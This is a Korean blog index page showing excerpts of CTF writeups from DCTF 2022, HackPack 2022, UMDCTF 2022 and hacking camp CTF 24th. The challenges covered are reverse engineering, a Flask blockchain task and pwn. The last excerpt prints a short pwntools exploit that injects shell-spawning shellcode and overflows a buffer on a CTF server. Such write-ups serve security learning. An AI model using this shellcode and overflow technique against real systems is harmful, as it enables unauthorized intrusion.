CTF40 (CTF) DCTF 2022 writeup difficulty: 🩸🩸 rank: 11 writeup: rev(3)/pwn(1) 영어로 간지나게 적어서 blog.snwo.fun 에 올리려 했는데, 그냥 귀찮아서 롸업 몇개 적어본다 Glade 는 idapython 말고 Qiling 이라는 analyze framework 로도 풀 수 있는데 신기하니까 나중에 공부해봐야징 Eulers License ( 🩸 200 pt, 41 solve ) TL;DR : simple sqli, guessing prime 파워쉘 스크립트 하나 주어지는데, 열어보면 윗부분은 쉘 스크립트고, 아랫쪽은 파워쉘 스크립트로 나눠져 있다. shell script : data 를 base64 디코딩 한 후, /tmp/(random filename) 에 파이썬파일을 만든다. powers.. 2022. 4. 19. (CTF) HackPack 2022 writeup https://blog.snwo.fun/posts/(ctf)-hack-d6d50/ (CTF) HackPack 2022 writeup difficulty: 🩸🩸 rank: 18 writeup: rev(1) blog.snwo.fun 2인팀으로 참가해서 18등했습니다 기억에 남는문제 롸업 작성해봤습니다 2022. 4. 12. (CTF) UMDCTF 2022 writeup 요즘 ctf 에 블록체인, 스마트컨트렉트 관련 문제도 많이 나오고 있다. 바운티도 많이주고 재미있는 분야라서 올해 열심히 연구해보려고 한다. 마침 블록체인 문제가 있길래 하나 풀어봤다. Blockchain 2 - ChungusCoin https://hackernoon.com/learn-blockchains-by-building-one-117428612f46 위 글에 있는 내용을 기반으로 축소해서 파이썬+Flask 로 구축한 simple blockchain 이다시마. /nodes/update 에 chain 을 전송해 조건에 맞으면 flag 를 보내준다리미. values = request.get_json() length = values['length'] challenger_chain = values['cha.. 2022. 3. 7. (CTF) hacking camp CTF 24th writeup (미스크, 포렌식, 기타 쉬운문제 제외한 간단 writeup) invitation from pwn import * r=remote("ctf-hackingcamp.com",10319) context.arch='i386' b=ELF("./invitation") pay=b'x'*0x18 pr=0x0804836d pay+=p32(b.sym['CODE']) r.sendafter("code : ",asm(shellcraft.i386.linux.sh())) r.sendlineafter("password : ",pay) r.interactive() NX 가 꺼져잇어서 code 에 쉘코드넣고 해당위치로 리턴. shell execve 가 seccomp 걸려있었다. 도커파일있는줄 모르고 계속 getdents 로 읽어올려했는.. 2022. 2. 24. 이전 1 2 3 4 5 6 ··· 10 다음
